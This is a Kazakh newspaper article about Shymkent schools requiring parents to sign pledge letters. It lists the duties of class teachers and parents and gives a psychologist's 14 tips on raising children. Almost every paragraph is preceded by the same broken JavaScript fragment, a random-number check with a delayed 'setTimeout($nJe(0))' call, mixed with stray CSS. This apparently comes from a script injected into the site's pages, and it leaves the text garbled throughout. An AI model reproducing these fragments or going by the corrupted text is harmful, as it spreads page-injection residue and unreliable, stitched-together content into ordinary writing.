2022-12-08

Баланы тәрбиелеудің сан түрлі әдісі бар соған қарамастан Шымкенттің мектептері ата-ананы да, баланы да «қол хатпен» тәрбиелегісі келеді

Spread the love

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Бүгінгі таңда мектеп тарапына айтылатын сын көп. Оқу жылы басталды, қай мектептің басшысын сұрамаңыз «жиналысқа кетті» деген әңгімені жиі естисіз, бітпейтін жиналыс. Қозғалатын тақырып біреу, мектеп оқушыларын қалай қылмысқа ұрындырмаймыз. Осы бағытта жүргізіліп жатқан нәтижелі жұмыстар туралы айту жағы кемшін, есесіне қағазбастылықтан көз ашпайсыз.  Аудан тұрғындарын қайдам, қалалық ата-аналар мектеп директорына  Қол хат жазу жағынан алдына жан салмай тұр. Мектепте қанша балаңыз оқиды сонша қол хат жазып бересіз. Тіпті  ішінде  «баламның кешкі 7-ден кейін көшеде ата-анасыз жүруін қадағалаймын» деген сөйлемдер де бар. Сонда ата-ана мектеп директорының алдында есеп беруі керек пе, мына сөйлемнің астарында сондай ой жатқан сияқты. Бюрократия! Қол хатты сіз жазбайсыз мектеп директоры қол қойып дайындап береді, сіздің  келісіміңізді беріп қол қоюыңыз керек. Кімнен кімнің қорғанып жатқаны белгісіз. Қылмыстың алдын алу шарасы дейін десең оған да келмейді. Жарайды, дайын қол хатқа қол қоюдың еш қиындығы жоқ қоя салуға болады, бірақ сол көп қағаздың қылмысты азайтуға қандай қатысы бар.  Егер мектептің міндеті мынадай, ата-ананыкі мынадай десе де келісуге болар еді.  Ондай жоқ, біржақтама. Осыдан кейін өзі мектептің, сынып жетекшісінің міндеті қайсы сонда деген заңды сауал туындайды.  Шымкенттің бірді-екілі мектебіне  осы туралы мәлімет берсеңіздер деп сұранып көріп едік, тиісті мамандардың дауысы «үркіп» шықты, «ол не үшін керек» дейді.  Мәлімет ауылдан тез келді.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Сонымен:

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Мектептің міндетіне:

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>1.Сынып жетекшінің атқаратын міндеті

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>2.Ата-ананың атқаратын міндеті

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>3.Бірлесіп жасалатын жұмыс, күтілетін нәтиже кіреді екен.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Сынып жетекшінің міндетіне:

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>1.Ата-аналармен тығыз байланыста болу;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>2.Оқушыларды, ата-аналарды сыныптық және қоғамдық ұжымдардың іс-шараларына тарту;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>3. Әр оқушының жеке басының қасиетін, психологиялық ерекшелігін, жан-жақты бақылап, зерттеу, олардың кәсіптік бағдарлығын, әрі өмірлік көзқарасын қалыптастыру, қабілетін және танымдық қасиетін дамыту;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>4.Тақырыптық ата-аналар жиналысын өткізу;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>5. Ата-аналар комитетімен кездесу;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>6. Оқушылардың құқықтарын және әлеуметтік жағдайын қорғауға көмек көрсету;
7. Өз сыныбында сабаққа қатысып отыру және пән мұғалімдерімен жұмыс;
8. Сыныпта болған төтенше жағдайларды дереу мектеп әкімшілігіне хабарлау жатады екен.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Ата-ананың міндетіне:

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>1.Баланың сынып жетекшісімен тығыз байланыста болуы;
2. Сабақтан келген балаңың күнделікті күнделігін тексеріп, көмек көрсету;
3.Мектепішілік ата-аналар жиналысына қатысу;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>4.Сыныптың ата-аналар комитетінің төрайымымен байланыста болу;
5. Баланың мектептегі жағдайын жасау барысында ерікті түрде оқу-тәрбие іс-шараларына қаржылық көмек көрсету;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>6.Мектептегі ашық есік күні баланың сабағына қатысу жатады.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Қол хат беру дегенді көрмедік. Ол сенімсіздіктен туатын жайт сияқты. Осы тұрғыдан келгенде қала мектептерінің  ата-аналарға деген сенімсіздігі күшті. Ата-анамен байланыстың «қол хаттан» басқа жаңа әдісі көрінбей тұр әзірге.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Бізді мектеп және сынып жетекшісінің міндетінен хабардар еткен отырарлық ұстаз психолог Алима Абсатова «ата-аналармен жүргізілетін жұмыс неғұрлым тиімді болуы үшін олармен байланыстың әр қилы түрлерін қолдану қажет. Осыған байланысты сынып жетекші ең бірінші сынып ата-аналар төрағасы және сынып ата-аналарымен тығыз байланыста болуы керек. Кез келген мәселенің жауабы ата-аналармен шешімін табуға тиісті. Егер сынып жетекшілері бұл мәселені бірлесіп дұрыс жолға қоя білсе, көптеген жұмыстарымыздан жеңілдіктер байқалар еді дей келе  оқушының ата-анасымен байланыс жасаудың көптеген жолдары бар. Атап айтсақ:

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>-Оқушының жанұясына барып тұру. Бұл-ата-аналармен жеке жұмыс істеудің неғұрлым кең тараған және тиімді түрі. Жанұяға барғанда сынып жетекшісі өз оқушысының үйдегі өмірімен, тұрмыс жағдайымен танысады. Ата-аналарымен және жанұяның басқа мүшелерімен әңгімелескенде ,сынып жетекшісі оқушының мінезі, қызығушылығы мен икемділігі туралы ата-аналарына, үлкендер мен кішілерге қарым-қатынасы туралы мағлұматтар алады.
Ата-аналарын мектепке тек баласы тәртіп бұзғанда немесе жаман оқи бастағанда ғана шақырмау керек. Ата-аналардың мектеп мұғалімдерімен кездесіп отыруы пайдалы ғана емес, қажет те. Ол кездесулер мектеп пен жанұя арасында тығыз байланыс орнатуға, оқушылардың оқуы мен тәртібінде кемшіліктерді болдырмауы үшін дер кезінде шара қолдануға мүмкіндік береді.
-Ата-аналармен хат алмасу. Кейбір сынып жетекшілері жанұямен байланыста ата-аналармен хат жазысып тұру түрін қолданады. Хат арқылы мектеп оқушысының үлгерімі мен тәртібі туралы хабарлап тұрады.
Кейде хат жазғанда ата-аналардан жанұя тәрбиесіндегі қиындықтар туралы сұрауға, бала тәрбиесі жөнінде олар қандай әдебиеттер оқитынын біліп, ол жөнінде тиісті жаңа кітаптар ұсынуға болады. Ата-аналармен хат жазысуға оқушының күнделік дәптері пайдаланылады. Сынып жетекшілері онда оқушысының оқуға, қоғамдық жұмысқа қатысты тәртібі туралы қысқаша жазып отырады.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>-Сыныптық ата-аналар жиналысы. Бұл — сынып жетекшісінің жанұямен байланысының аса-маңызды бір түрі. Сыныптағы оқу-тәрбие жұмысының жайымен және міндеттерімен ата-аналарды таныстырып отыру үшін мұндай оқу жылының басында және әрбір тоқсанның аяғында өткізіледі.
Олардың мақсаты ата-аналарды нақтылы педагогикалық біліммен қаруландырып, жанұяда бала тәрбиелеудің алдыңғы қатарлы тәжірибесімен таныстырып отыру болып табылады. Біз, сынып жетекшілері ең бірінші өзіміздің жетекшілік етіп отырған сыныбымыздың ата-аналарына арналған педагогикалық білімдерді насихаттау үшін әңгімелер мен лекциялар өткізуіміз керек. Олардың мазмұны ата-аналардың талаптарына, оқу-тәрбие жұмыстарының нақтылы міндеттеріне байланысты болады. Әңгімелер мен лекциялар жүйелі түрде белгілі бағдарлама бойынша өткізіліп отырса ғана көздеген мақсатына жете алады. Мысалы: «Ата-аналардың бала тәрбиелеу үрдісі», «Балалардың ұқыптылығы», «Үлкенді сыйлау», «Баланың мінез-құлығы», т.б-лар дейді.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Біз осы орайда ата-аналарға  сіздің балаңыз оқып жүрген мектепте жоғарыда айтылған әдіс-тәсілдердің қайсысы қолданылып жүр деген сұрақ қойғымыз келеді. Пікірлеріңізді ашық айтсаңыздар, сонда ғана біз кемшіліктің қай тұстан кетіп жатқанын аңғарамын. Кемшілік табылған соң оны болдырмаудың жолдары оңайға түседі. Сонда талай уақытты жеп, талай қағаздың обалына қалдыратын  қол хат жолдаудың керегі де болмай қалады.14    К Е Ң Е С

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Құрметті ата-ана!

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Психолог маман Алима Бакирақызының психологиялық-педагогикалық тұрғыдан берілетін төмендегі 14 кеңесіне назар салыңыз:
1. Таңертең сабаққа барарында баланы жайлап қана оятыңыз.
Сіздің биязы үніңіз бен күлімсіреген келбетіңіз оның ұйқысын ашуы тиіс. Кешегі істеген теріс қылықтарын айтып, басқа да түкке тұрмайтын нәрсеге жүйкесін жұқартпаңыз. Тамағын ішпей жатып ұрыс-керіс ұйымдастырмаңыз.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>2. Егер балаңыз сабақтан кешігетіндей болып жатса, онда «Бол да болдың!» астына алып айғайламаңыз. Оған оны ертерек оятпаған өзіңіз кінәлісіз.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>3. Баланы сабаққа ашқұрсақ жібермеңіз;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>4. «Бұзық болма!», «Қисалаңдамай тыныш жүр!», «Бүгін 2 алсаң құртамын!» деген ескертулерді жиі айта бермеңіз. Керісінше, оған жылу сыйлап, жақсы баға алып келуіне тілектестік білдіріңіз;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>5. Есіктен кірмей жатып, «Бүгін қандай баға алдың?» деп бас салып балаңызды сұрақтың астына алмаңыз. Мектептен келген балаңызды көңілді қарсы алыңыз, оның сабақтан шаршап келгенін ескеріңіз. Егер бала әлденеге ренжіп келсе, бірдеңе айтпақшы болса, «сені тындауға уақытым жоқ» демей, арнайы көңіл бөліп, мұқият тыңдаңыз;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>6. Бала бірдеңеге ашуланып жүрсе, үндемеңіз. Сабасына түскен соң, ол болған жайды өзі-ақ айтады;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>7. Баланың болымсыз көрінген қылығы үшін мұғалім сізді шақыртып алса, өзара әңгімеге баланы қатыстырмаңыз;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>8. Мектептен келе сала баланы отырғызып қойып сабаққа дайындалтпаңыз. Одан да оның 2-3 сағат ойнап, демалғаны жөн, түсте ұйықтап тынықсын. Бесін мезгілі — сабаққа әзірленудің сәтті кезі.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>9. Бір мезгілде барлық сабаққа әзірленуді талап етпеңіз. Әр сабаққа әзірленген кезде үзіліс жасаған дұрыс;

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>10.Сабаққа әзірленіп жатқан баланың желкесінен төніп тұрмаңыз. Дөрекі сөйлемеңіз. Одан да көмектесіп, бірлесіп дайындалыңыз.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>11.«Егер, сен, осы сабақты орындамасаң!» деп басталатын тәртіпке шақыру баланың жүйкесіне әсер етеді. Одан да өзіңіз кірісіп, жайлап жетектеп отырыңыз.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>12.Күнде жарты сағат ештеңеге алаңдамай балаларыңызбен емін-еркін, жақын тартып әңгімелесіп тұрыңыз.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>13.Балаңыздың көңіл-күйі нашар болса, онда бірден назар аударыңыз. Ол сабақтан зорығуы мүмкін.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>14.Егер балаңыз айтқаныңызды тыңдамайтын болса, онда ұстазымен, психолог маманмен, дәрігермен кеңесіңіз.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Халық даналығында: «Баланы 5-ке дейін патшаңдай көтер, 15-ке дейін құлыңдай жұмса, 15-тен кейін досыңдай сыйла,» — деген керемет ұлағатты нақыл бар. Соны әрдайым басшылыққа алыңыз. Бала бойындағы жағымсыз мінез-құлықтар үнемі есепке алынып, ата-ана мен мұғалім бірлікте болып, баланың жақсы, жағымды істерін ылғи марапаттауы қажет.
Қоршаған ортадағы теріс әрекеттерден үнемі сақтандырып отырса, мұғалім мен ата-ана әрқашан сергектік, шыдамдылық танытып, жан жылуын беріп, шеберлік көрсете білсе, онда балаларымыз өзімшіл болмай, қиындықтан қашпай, міндетті мен парызын орындайтын ұрпақ болары анық.

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>Сөз соңын ұлы ұстаз Макаренконың: «Баламен шындап сөйлесу үшін орын мен уақытты таңдай біліңіз. Кіре берістегі, жол-жөнекей айтылған сөз бала көңілінде керекті із қалдырмайды деген», — парасатты ойын естеріңізге саламын.{jcomments on}

http://kyzmet-gazeti.kz/

dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tom: 0.0001pt; text-indent: 1cm; line-height: normal; background-image: initial; background-attachment: initial; background-color: white; text-align: justify;»>


Яндекс.Метрика